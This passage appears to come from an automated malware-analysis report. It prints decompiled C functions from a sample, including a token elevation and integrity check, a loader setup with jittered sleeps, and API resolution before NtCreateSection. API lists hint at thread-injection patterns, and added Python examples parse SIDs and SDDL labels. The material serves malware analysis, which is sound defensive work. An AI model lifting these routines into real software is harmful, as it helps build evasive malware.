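    "LW": ("S-1-16-4096", "Low"),
    "ME": ("S-1-16-8192", "Medium"),
    "HI": ("S-1-16-12288", "High"),
    "SI": ("S-1-16-16384", "System"),
}
_SID_TO_NAME = {sid: name for sid, name in MANDATORY_LABEL_SIDS.values()}
MANDATORY_LABEL_RIGHTS = {
    "NR": "SYSTEM_MANDATORY_LABEL_NO_READ_UP",
    "NW": "SYSTEM_MANDATORY_LABEL_NO_WRITE_UP",
    "NX": "SYSTEM_MANDATORY_LABEL_NO_EXECUTE_UP",
}

_ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_sacl_labels(sddl: str) -> list:
    """Return the mandatory-label ACEs (type 'ML') found after the 'S:' part of an SDDL string.

    Each result is a dict with the label SID, its level name, the ACE flags and the
    decoded rights. Other ACE types are ignored; a string without an SACL yields [].
    """
    sacl_pos = sddl.find("S:")
    if sacl_pos < 0:
        return []
    labels = []
    for ace in _ACE_RE.findall(sddl[sacl_pos + 2:]):
        fields = ace.split(";")
        # ACE string format: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
        if len(fields) != 6 or fields[0] != "ML":
            continue
        _ace_type, ace_flags, rights, _obj, _inh_obj, sid = fields
        # The rights field is a concatenation of two-letter codes, e.g. "NWNR".
        codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        if sid in MANDATORY_LABEL_SIDS:
            sid_str, level = MANDATORY_LABEL_SIDS[sid]
        else:
            sid_str, level = sid, _SID_TO_NAME.get(sid, "unknown")
        labels.append({
            "sid": sid_str,
            "level": level,
            "flags": ace_flags,
            "rights": [MANDATORY_LABEL_RIGHTS.get(c, c) for c in codes],
        })
    return labels


if __name__ == "__main__":
    # Argument dwords taken from this function's API list in the report.
    for v in (0x4C44544E, 0x4D283A53):
        print("%08X -> %r" % (v, dword_to_ascii(v)))
    # Constructed SDDL string (not the sample's): low mandatory level, no write-up.
    print(parse_sacl_labels("S:(ML;;NW;;;LW)"))
```

A label ACE on a kernel object or file lets a process at the named level or above (but not below) write to it; a low-integrity label with NW is what a component needs if it is to be reachable from a low-integrity browser process. Which object this sample labels cannot be read from the call alone.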

                                                            APIs
                                                              • Part of subcall function 045692F3: GetProcAddress.KERNEL32(?,00000318), ref: 04569318
                                                              • Part of subcall function 045692F3: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04569334
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0457B987
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0457BA72
                                                              • Part of subcall function 045692F3: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 0456949E
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0457B9BD
                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0457B9C9
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 0457BA06
                                                            • StrChrA.SHLWAPI(?,0000002E), ref: 0457BA0F
                                                            • lstrcmpi.KERNEL32(?,00000000), ref: 0457BA21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                                            • String ID:
                                                            • API String ID: 3901270786-0
                                                            • Opcode ID: 9b484acff1d9ec31f3349fa01aa6ae38ef2f1f60812a42f17cdc1e413e239287
                                                            • Instruction ID: 26c3f91a053b4521506af425e048e21f56caa6b1591e415b749337ff8fea2ebd
                                                            • Opcode Fuzzy Hash: 9b484acff1d9ec31f3349fa01aa6ae38ef2f1f60812a42f17cdc1e413e239287
                                                            • Instruction Fuzzy Hash: EE316F71508311AFD321DF15E944B6BBBE8FF88B58F000A29F884A7241D774FA04DBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0457AB41: memset.NTDLL ref: 0457AB4B
                                                            • OpenEventA.KERNEL32(00000002,00000000,0458C1E4,?,00000000,00000000,?,045722F6), ref: 04580555
                                                            • SetEvent.KERNEL32(00000000,?,045722F6), ref: 04580562
                                                            • Sleep.KERNEL32(00000BB8,?,045722F6), ref: 0458056D
                                                            • ResetEvent.KERNEL32(00000000,?,045722F6), ref: 04580574
                                                            • CloseHandle.KERNEL32(00000000,?,045722F6), ref: 0458057B
                                                            • GetShellWindow.USER32 ref: 04580586
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0458058D
                                                              • Part of subcall function 04581C1F: RegCloseKey.ADVAPI32(?), ref: 04581CA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                                            • String ID:
                                                            • API String ID: 53838381-0
                                                            • Opcode ID: 5a0a5e5c339fb5c1e9662a1e844102d279ab661512a7c3c1e7044235290f2d08
                                                            • Instruction ID: f723d106479c9fea6dcecbb3696baa5013c76486f0dd8e7bed61860c5cafadb4
                                                            • Opcode Fuzzy Hash: 5a0a5e5c339fb5c1e9662a1e844102d279ab661512a7c3c1e7044235290f2d08
                                                            • Instruction Fuzzy Hash: 42218E72200111AFD2217AA6BC89E6B7BADFBC6A14F11510CF65AF3140DE38AC09B771
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
			E00DD39E8(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;      // default result: treat the process as elevated
				_v20 = 0x2000; // default RID: SECURITY_MANDATORY_MEDIUM_RID
				// The global at 0xdda2b4 is compared against 5; this is consistent with an OS major-version check
				// (integrity levels and TokenElevation exist only from Vista, version 6, onward).
				if( *0xdda2b4 > 5) {
					_v16 = 0;
					// Current process (-1), access 0x20008 = TOKEN_READ
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; 0x14 = TokenElevation, fills TokenIsElevated
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; 0x19 = TokenIntegrityLevel, size query only
						if(_v8 != 0) {
							_t46 = E00DD77D7(_v8); // heap allocation wrapper (RtlAllocateHeap, see subcall list below)
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed; fetch TOKEN_MANDATORY_LABEL
								if(_t33 != 0) {
									// *_t46 is the label SID; its last sub-authority is the integrity RID
									// (0x1000 low, 0x2000 medium, 0x3000 high, 0x4000 system)
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00DD77EC(_t46); // presumably the matching free for E00DD77D7
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;  // out parameter: integrity RID
				return _v16;   // TokenIsElevated, or 1 on versions where the check is skipped
			}
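
E00DD39E8 settles two things the rest of the sample can branch on: whether the token is elevated (TokenElevation, class 0x14) and which integrity RID the token's mandatory label carries (TokenIntegrityLevel, class 0x19, read as the last sub-authority of the label SID). The Python below is an added example, not code from the report or from the sample: it parses a binary SID the way GetSidSubAuthorityCount/GetSidSubAuthority are used here and reproduces the function's defaults (elevated=1 and RID 0x2000 when the version check is not passed, RID 0x2000 when the label query fails). Function and constant names are the example's own, and the label SIDs it is fed are constructed test input.

```python
import struct

# Integrity RIDs: last sub-authority of the mandatory-label SID S-1-16-<rid>.
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x3000: "High",
    0x4000: "System",
}


def parse_sid(raw: bytes):
    """Parse a binary SID into (revision, identifier_authority, [sub_authorities])."""
    if len(raw) < 8:
        raise ValueError("SID header truncated")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    authority = int.from_bytes(raw[2:8], "big")   # 48-bit big-endian identifier authority
    if len(raw) < 8 + 4 * count:
        raise ValueError("SID sub-authorities truncated")
    subs = list(struct.unpack_from("<%dI" % count, raw, 8))  # little-endian DWORDs
    return revision, authority, subs


def sid_to_string(raw: bytes) -> str:
    revision, authority, subs = parse_sid(raw)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def integrity_rid(raw_sid: bytes) -> int:
    """Mirror GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1): the last sub-authority.

    The decompilation masks (count - 1) with 0xff because GetSidSubAuthorityCount
    returns a pointer to a single byte.
    """
    _, _, subs = parse_sid(raw_sid)
    if not subs:
        raise ValueError("SID has no sub-authorities")
    return subs[(len(subs) - 1) & 0xFF]


def classify_token(os_major: int, token_is_elevated, label_sid):
    """Reproduce E00DD39E8's decision logic on values GetTokenInformation would return.

    Returns (elevated, integrity_rid). Defaults follow the decompilation: when the
    version check fails (os_major <= 5, i.e. before Vista) the function reports
    elevated=1 and RID 0x2000 without touching the token; on later versions an
    absent label (label_sid is None) leaves the RID at 0x2000 and an absent
    elevation value is reported as 0.
    """
    elevated, rid = 1, 0x2000
    if os_major > 5:
        elevated = int(bool(token_is_elevated))
        if label_sid is not None:
            rid = integrity_rid(label_sid)
    return elevated, rid


def make_label_sid(rid: int) -> bytes:
    """Build S-1-16-<rid> (constructed input; authority 16 is SECURITY_MANDATORY_LABEL_AUTHORITY)."""
    return bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", rid)


if __name__ == "__main__":
    for os_major, elev, label in ((5, None, None), (6, 0, make_label_sid(0x1000)), (10, 1, make_label_sid(0x3000))):
        elevated, rid = classify_token(os_major, elev, label)
        print("os %d: elevated=%d rid=0x%04x (%s)" % (os_major, elevated, rid, INTEGRITY_LEVELS.get(rid, "?")))
```

The os_major argument stands in for the `*0xdda2b4 > 5` comparison; reading that global as an OS major version is an inference from how it is used, not something the report states.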

Per-instruction address column for E00DD39E8 omitted here; the addresses listed run from 0x00dd39f5 to 0x00dd3aae.

                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00DD3A1A
• GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,00000000,00000000), ref: 00DD3A3A
                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00DD3A4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00DD3A9A
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00DD3A6D
                                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DD3A75
                                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DD3A85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
• Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                            • String ID:
                                                            • API String ID: 1295030180-0
                                                            • Opcode ID: 0abf2698a3affe3744a9d11afa1342a116564afac0383813bfd15fc14d3142d4
                                                            • Instruction ID: cdd9d4ddeecb127522a28b32a0d13b0eaecb82022a5fad288326d862f6034c41
                                                            • Opcode Fuzzy Hash: 0abf2698a3affe3744a9d11afa1342a116564afac0383813bfd15fc14d3142d4
                                                            • Instruction Fuzzy Hash: 6A213975A00219FFEB10DF94DC84EAEBBB9EB08344F0080A6E551A6261D7719F44EB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
			E00DD6632(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed; private growable heap, 4 MB initial size, kept in the global at 0xdda290
				 *0xdda290 = _t14;
				if(_t14 != 0) {
					 *0xdda180 = GetTickCount(); // start-time stamp
					_t16 = E00DD6707(_a4);
					if(_t16 != 0) { // a non-zero result is treated as an error code and returned unchanged
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						// Seed from the current FILETIME shifted right by 5 and the SwitchToThread result. The four pushes
						// (0, 0x13, high, low) are the arguments of a compiler 64-bit arithmetic helper at 0x00DD7F3A
						// (the 64-bit time value and the 64-bit constant 0x13); its result is not used by the decompiled code.
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L00DD7F3A();
						_t41 = _t18 + _t20;
						_t22 = E00DD1228(_a4, _t41); // retried for as long as it returns 1
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed; jittered back-off of 3 << (seed & 7) ms, i.e. 3 to 384 ms
					} while (_t22 == 1);
					_t25 =  *0xdda2ac; // 0x250
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32); // call through an import the decompiler did not resolve (decompilation quality 73%)
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0xdda2b8 = 1; // executed; flag in the global at 0xdda2b8, set for the rest of the run
						}
					}
					// The function at 0x00DD5DCD listed earlier in this section (ConvertStringSecurityDescriptorToSecurityDescriptorA,
					// wsprintfA, user and computer name); the return address 0x00DD66FE appears in that function's API call stacks.
					_t16 = E00DD5DCD(_t34); // executed
					goto L10;
				}
				_t16 = 8; // ERROR_NOT_ENOUGH_MEMORY when HeapCreate fails
				goto L10;
			}

                                                            APIs
                                                            • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DD6647
                                                            • GetTickCount.KERNEL32 ref: 00DD665E
                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00DD667E
                                                            • SwitchToThread.KERNEL32(?,00000001), ref: 00DD6684
                                                            • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00DD66A0
                                                            • Sleep.KERNELBASE(00000003,00000000,?,00000001), ref: 00DD66BD
                                                            • IsWow64Process.KERNEL32(00000250,?,?,00000001), ref: 00DD66DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                            • String ID:
                                                            • API String ID: 3690864001-0
                                                            • Opcode ID: 431dab03a3ccf96ae601f456584ab0b6855f9d3d10eac9fa6b7275f11bf349a2
                                                            • Instruction ID: 14854bb7c7bdf9b8bae4cac457b5d861bb4ffc77c03c43971194f368ba008435
                                                            • Opcode Fuzzy Hash: 431dab03a3ccf96ae601f456584ab0b6855f9d3d10eac9fa6b7275f11bf349a2
                                                            • Instruction Fuzzy Hash: 622190B2641304AFC710AFB5EC99A6ABBE8EB44351F04853FF515C2350E735D8448BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E00DD637D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _t9;
                                                            				intOrPtr _t13;
                                                            				char* _t19;
                                                            				char* _t28;
                                                            				void* _t33;
                                                            				void* _t34;
                                                            				char* _t36;
                                                            				void* _t38;
                                                            				intOrPtr* _t39;
                                                            				char* _t40;
                                                            				char* _t42;
                                                            				char* _t43;
                                                            
                                                            				_t34 = __edx;
                                                            				_push(__ecx);
                                                            				_t9 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t1 = _t9 + 0xddb61b; // 0x253d7325
                                                            				_t36 = 0;
                                                            				_t28 = E00DD2F3E(__ecx, _t1);
                                                            				if(_t28 != 0) {
                                                            					_t39 = __imp__;
                                                            					_t13 =  *_t39(_t28, _t38);
                                                            					_v8 = _t13;
                                                            					_t6 =  *_t39(_a4) + 1; // 0x39c9631
                                                            					_t40 = E00DD77D7(_v8 + _t6);
                                                            					if(_t40 != 0) {
                                                            						strcpy(_t40, _t28);
                                                            						_pop(_t33);
                                                            						__imp__(_t40, _a4);
                                                            						_t19 = E00DD488A(_t33, _t34, _t40, _a8); // executed
                                                            						_t36 = _t19;
                                                            						E00DD77EC(_t40);
                                                            						_t42 = E00DD1F34(StrTrimA(_t36, "="), _t36);
                                                            						if(_t42 != 0) {
                                                            							E00DD77EC(_t36);
                                                            							_t36 = _t42;
                                                            						}
                                                            						_t43 = E00DD6006(_t36, _t33);
                                                            						if(_t43 != 0) {
                                                            							E00DD77EC(_t36);
                                                            							_t36 = _t43;
                                                            						}
                                                            					}
                                                            					E00DD77EC(_t28);
                                                            				}
                                                            				return _t36;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00DD2F3E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00DD6396,253D7325,00000000,00000000,?,00000000,00DD72E3), ref: 00DD2FA5
                                                              • Part of subcall function 00DD2F3E: sprintf.NTDLL ref: 00DD2FC6
                                                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                            • lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • strcpy.NTDLL ref: 00DD63C7
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD488A: lstrlen.KERNEL32(00000000,00000000,00DD72E3,00000000,?,00DD63E1,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD489B
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                              • Part of subcall function 00DD1F34: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,00DD63FB,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD1F3E
                                                              • Part of subcall function 00DD1F34: _snprintf.NTDLL ref: 00DD1F9C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                            • String ID: =
                                                            • API String ID: 2864389247-1428090586
                                                            • Opcode ID: 26f07193c4cab07c06d4088e62ee196fb74eaefeb30977765352baa7a5061a0b
                                                            • Instruction ID: 4824764edd9ccb04f54fd2bc2f5a58da81af54c99cef2ba02283c3ebea52f499
                                                            • Opcode Fuzzy Hash: 26f07193c4cab07c06d4088e62ee196fb74eaefeb30977765352baa7a5061a0b
                                                            • Instruction Fuzzy Hash: 5911703B5062257747126BB89C85C6F3BADDF897607094457F500E7302EA39CD0297F5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 045794B9
                                                              • Part of subcall function 0457527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 0457529A
                                                              • Part of subcall function 0457527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752AB
                                                              • Part of subcall function 0457527F: CloseHandle.KERNEL32(00000000,?,?,045613A2,00000000,0458C16C,00000000,?), ref: 045752BE
                                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,73B74EE0,00000000), ref: 04579573
                                                            • WaitForSingleObject.KERNEL32(00000064), ref: 04579581
                                                            • SuspendThread.KERNEL32(?), ref: 04579594
                                                              • Part of subcall function 0457969C: memset.NTDLL ref: 0457995D
                                                            • ResumeThread.KERNELBASE(?), ref: 04579617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Thread$ProcessResumememset$CloseHandleObjectOpenSingleSuspendWaitWow64
                                                            • String ID:
                                                            • API String ID: 568453049-0
                                                            • Opcode ID: 8617506ba26e26180b75f1425927475de4e5944dc05200b4b5c2d419bb0430f2
                                                            • Instruction ID: 83f04ca37ac2badef36c39932f69fce7f3dc65e1fcfe5c19d70b29c2d973688a
                                                            • Opcode Fuzzy Hash: 8617506ba26e26180b75f1425927475de4e5944dc05200b4b5c2d419bb0430f2
                                                            • Instruction Fuzzy Hash: 0141AEB2900219AFEF21AF64EC84EAE7BB9FF44354F104439E905A6110DB35EE54EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00DD740B: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,039C89D0,00DD19E4,?,?,?,?,?,?,?,?,?,?,?,00DD19E4), ref: 00DD74D7
                                                              • Part of subcall function 00DD2AA4: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00DD2AE1
                                                              • Part of subcall function 00DD2AA4: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00DD2B12
                                                            • SysAllocString.OLEAUT32(?), ref: 00DD1A10
                                                            • SysAllocString.OLEAUT32(0070006F), ref: 00DD1A24
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DD1A36
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1A9A
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1AA9
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD1AB4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                            • String ID:
                                                            • API String ID: 2831207796-0
                                                            • Opcode ID: 1f4c821dece6634a186be3879bd2fb8322d8639a16a1abed05c2a04d96a22d5f
                                                            • Instruction ID: c650e65466a18ddd99679a41e2f771acf870917fe8d6b7a9a53b375feb475204
                                                            • Opcode Fuzzy Hash: 1f4c821dece6634a186be3879bd2fb8322d8639a16a1abed05c2a04d96a22d5f
                                                            • Instruction Fuzzy Hash: A9314E36D01609AFDB01DFA8D844AAFB7B6EF49310F154466ED10EB220DB719D06CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(0457C495,?,?,00000402,0457C495,04588570,00000018,0456A0D1,?,00000402,0458B7A4,0458B7A0,-0000000C,00000000), ref: 0457A792
                                                            • VirtualProtect.KERNELBASE(00000000,00000004,0457C495,0457C495,00000000,00000004,0457C495,0458B7A4,0457C495,?,?,00000402,0457C495,04588570,00000018,0456A0D1), ref: 0457A81D
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0457A845
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0457A863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                            • String ID:
                                                            • API String ID: 3666628472-0
                                                            • Opcode ID: fd27e26ead861c90b480edd49d28e7eb603d726d203e90349a8e424c39ddf6c1
                                                            • Instruction ID: 00bedb84f4c7cba42283f14a4d4240f8ea28f0d2dfee5a59a5e746879d4bbafa
                                                            • Opcode Fuzzy Hash: fd27e26ead861c90b480edd49d28e7eb603d726d203e90349a8e424c39ddf6c1
                                                            • Instruction Fuzzy Hash: 45415E71900615EFDB11DFA5D884A9EBBF4FF48340B108529E516E7250DB74BE41EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E6E4B165D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                            				intOrPtr _v8;
                                                            				_Unknown_base(*)()* _t29;
                                                            				_Unknown_base(*)()* _t33;
                                                            				_Unknown_base(*)()* _t36;
                                                            				_Unknown_base(*)()* _t39;
                                                            				_Unknown_base(*)()* _t42;
                                                            				intOrPtr _t46;
                                                            				struct HINSTANCE__* _t50;
                                                            				intOrPtr _t56;
                                                            
                                                            				_t56 = E6E4B2102(0x20);
                                                            				if(_t56 == 0) {
                                                            					_v8 = 8;
                                                            				} else {
                                                            					_t50 = GetModuleHandleA( *0x6e4b41d0 + 0x6e4b5014);
                                                            					_v8 = 0x7f;
                                                            					_t29 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b50e1);
                                                            					 *(_t56 + 0xc) = _t29;
                                                            					if(_t29 == 0) {
                                                            						L8:
                                                            						E6E4B2117(_t56);
                                                            					} else {
                                                            						_t33 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b50f1);
                                                            						 *(_t56 + 0x10) = _t33;
                                                            						if(_t33 == 0) {
                                                            							goto L8;
                                                            						} else {
                                                            							_t36 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b5104);
                                                            							 *(_t56 + 0x14) = _t36;
                                                            							if(_t36 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								_t39 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b5119);
                                                            								 *(_t56 + 0x18) = _t39;
                                                            								if(_t39 == 0) {
                                                            									goto L8;
                                                            								} else {
                                                            									_t42 = GetProcAddress(_t50,  *0x6e4b41d0 + 0x6e4b512f);
                                                            									 *(_t56 + 0x1c) = _t42;
                                                            									if(_t42 == 0) {
                                                            										goto L8;
                                                            									} else {
                                                            										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                            										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                            										_t46 = E6E4B2013(_t56, _a12); // executed
                                                            										_v8 = _t46;
                                                            										if(_t46 != 0) {
                                                            											goto L8;
                                                            										} else {
                                                            											 *_a16 = _t56;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _v8;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 6E4B2102: HeapAlloc.KERNEL32(00000000,?,6E4B13AF,?,00000000,00000001,?,?,?,6E4B1A94), ref: 6E4B210E
                                                            • GetModuleHandleA.KERNEL32(?,00000020), ref: 6E4B1681
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16A3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16B9
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16CF
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16E5
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 6E4B16FB
                                                              • Part of subcall function 6E4B2013: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000), ref: 6E4B2070
                                                              • Part of subcall function 6E4B2013: memset.NTDLL ref: 6E4B2092
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
